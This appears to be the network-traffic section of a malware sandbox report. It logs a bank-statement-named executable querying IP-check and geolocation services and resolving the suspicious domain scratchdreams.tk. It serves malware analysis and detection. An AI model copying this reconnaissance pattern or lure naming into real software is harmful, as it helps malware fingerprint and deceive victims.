                                                            May 2, 2024 11:55:11.961673021 CEST5115753192.168.2.51.1.1.1
                                                            May 2, 2024 11:55:12.053781033 CEST53511571.1.1.1192.168.2.5

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            May 2, 2024 11:54:52.996556997 CEST192.168.2.51.1.1.10xff48Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                            May 2, 2024 11:54:55.173474073 CEST192.168.2.51.1.1.10x8b83Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                            May 2, 2024 11:55:11.961673021 CEST192.168.2.51.1.1.10x1e7eStandard query (0)scratchdreams.tkA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            May 2, 2024 11:54:53.084842920 CEST1.1.1.1192.168.2.50xff48No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                            May 2, 2024 11:54:53.084842920 CEST1.1.1.1192.168.2.50xff48No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                            May 2, 2024 11:54:53.084842920 CEST1.1.1.1192.168.2.50xff48No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                            May 2, 2024 11:54:53.084842920 CEST1.1.1.1192.168.2.50xff48No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                            May 2, 2024 11:54:53.084842920 CEST1.1.1.1192.168.2.50xff48No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                            May 2, 2024 11:54:53.084842920 CEST1.1.1.1192.168.2.50xff48No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                            May 2, 2024 11:54:55.261873960 CEST1.1.1.1192.168.2.50x8b83No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                            May 2, 2024 11:54:55.261873960 CEST1.1.1.1192.168.2.50x8b83No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                            May 2, 2024 11:55:12.053781033 CEST1.1.1.1192.168.2.50x1e7eNo error (0)scratchdreams.tk104.21.27.85A (IP address)IN (0x0001)false
                                                            May 2, 2024 11:55:12.053781033 CEST1.1.1.1192.168.2.50x1e7eNo error (0)scratchdreams.tk172.67.169.18A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • reallyfreegeoip.org
                                                            • scratchdreams.tk
                                                            • checkip.dyndns.org

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549706132.226.247.73806052C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 2, 2024 11:54:53.320055008 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            May 2, 2024 11:54:53.516165018 CEST323INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:53 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 83c95c913fbc6af9a6605bddda3415d0
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>
                                                            May 2, 2024 11:54:54.891679049 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            May 2, 2024 11:54:55.088221073 CEST323INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:54 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: b1bedc95d83f06c118f34fb4f02f0cf7
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>
                                                            May 2, 2024 11:54:55.885077000 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            May 2, 2024 11:54:56.081897974 CEST323INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 047f6a8b09beb87a8c9ce24e9e8f69e9
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549710132.226.247.73806052C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 2, 2024 11:54:56.737152100 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            May 2, 2024 11:54:56.935266972 CEST323INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:56 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: d9447c882bc6797db6594f3f567d575e
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.549713132.226.247.73806052C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 2, 2024 11:54:57.545845032 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            May 2, 2024 11:54:57.780755043 CEST323INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:57 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 7834562fff9685365a390e8090b21857
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.549716132.226.247.73806052C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 2, 2024 11:54:58.397499084 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            May 2, 2024 11:54:58.593482971 CEST323INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:58 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 1e73ae924655a604c394604c99b21b80
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.549718132.226.247.73806052C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 2, 2024 11:55:00.060322046 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            May 2, 2024 11:55:00.257428885 CEST323INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:55:00 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 28814ef55075da41f4f36dcd047f475f
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.549720132.226.247.73806052C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 2, 2024 11:55:00.916456938 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            May 2, 2024 11:55:04.476000071 CEST323INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:55:04 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: e07378151365a0cd8a498a9b44b2acef
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.549722132.226.247.73806052C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 2, 2024 11:55:05.148523092 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            May 2, 2024 11:55:11.466059923 CEST323INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:55:11 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: aa35b04f9faca5352cc7c974dc6d2e3e
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549708172.67.177.1344436052C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 09:54:55 UTC87OUTGET /xml/191.96.150.225 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-05-02 09:54:55 UTC706INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:55 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 14579
                                                            Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xKqt2sPUhrewvhw1WwWKlkeM%2FniftMsoojetJqM3GivStNFHvZTQsJBPIIXb7ldlo8WKSngJJ4SQyKJdB%2Ft3htrAibl5dUEFanwRz2KmgaSDfYH7GvQxRjdR4MzQN8CdOjx%2BOGRF"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d721fade2c1891-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 09:54:55 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                            Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                            2024-05-02 09:54:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549709172.67.177.1344436052C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 09:54:56 UTC63OUTGET /xml/191.96.150.225 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-05-02 09:54:56 UTC720INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:56 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 14580
                                                            Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IkwLqGN3tpkR22OHGZkAi%2FPL8SW1XNN6F8G0N%2FWNoP1bb%2BJ%2BMOy0OL7K0cOY9TrV0av469OW%2F8Zu9n%2FUE%2BP4Cd46%2BnPD%2Fo89eJBN%2BC7DFnSwAV3q3VVWJfjM7CDQ88VMWgoGiCpm"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d721ff09fd4233-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 09:54:56 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                            Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                            2024-05-02 09:54:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.549711172.67.177.1344436052C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 09:54:57 UTC87OUTGET /xml/191.96.150.225 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-05-02 09:54:57 UTC710INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:57 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 14581
                                                            Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kQpgeJqd1p%2FryGfqOVqxJLgwGJIwgEF4evXgILmdOTr1K5dI0vbj2W2vXP7GmtCtn%2FEAzB%2BMsQ9znYStrmDEvoBy5BrugJeRQKbGwU4jVDAjL%2BqlDbl%2F7qCQLAzlHdvxKlUG7IpK"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d722040a31c333-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 09:54:57 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                            Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                            2024-05-02 09:54:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.549714172.67.177.1344436052C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 09:54:57 UTC87OUTGET /xml/191.96.150.225 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-05-02 09:54:58 UTC702INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:58 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 14582
                                                            Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TI2vwNfrOF88E6MuWIYXYM1OzZYPVxDzz0I3uJQSzs6IEjKQDe1C1wfvX1akEeUSLYFBZvx%2FjGE2Idrn0PrvBDXd3T8p0kgwRaUBImaDnKnAqWw2gy7kn1yqGJ9jzqb247Toez86"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d7220959a532c7-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 09:54:58 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                            Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                            2024-05-02 09:54:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.549717172.67.177.1344436052C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 09:54:59 UTC63OUTGET /xml/191.96.150.225 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-05-02 09:54:59 UTC708INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:59 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 14583
                                                            Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HVTiUbgkGxjh3vYU%2FPPN9yXsGcs6orsOZ9vubmyIir72n%2F5%2F8qNEHQp5RZTZJrnfA8XVHszTZvTY9h3IFtLoGhpaDiZjPakvciQU33yslDNUDMpmiHPdp5m5%2Bb8iudoJ7y9lc7cw"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d722121aa9431b-EWR
                                                            alt-svc: h3=":443"; ma=86400
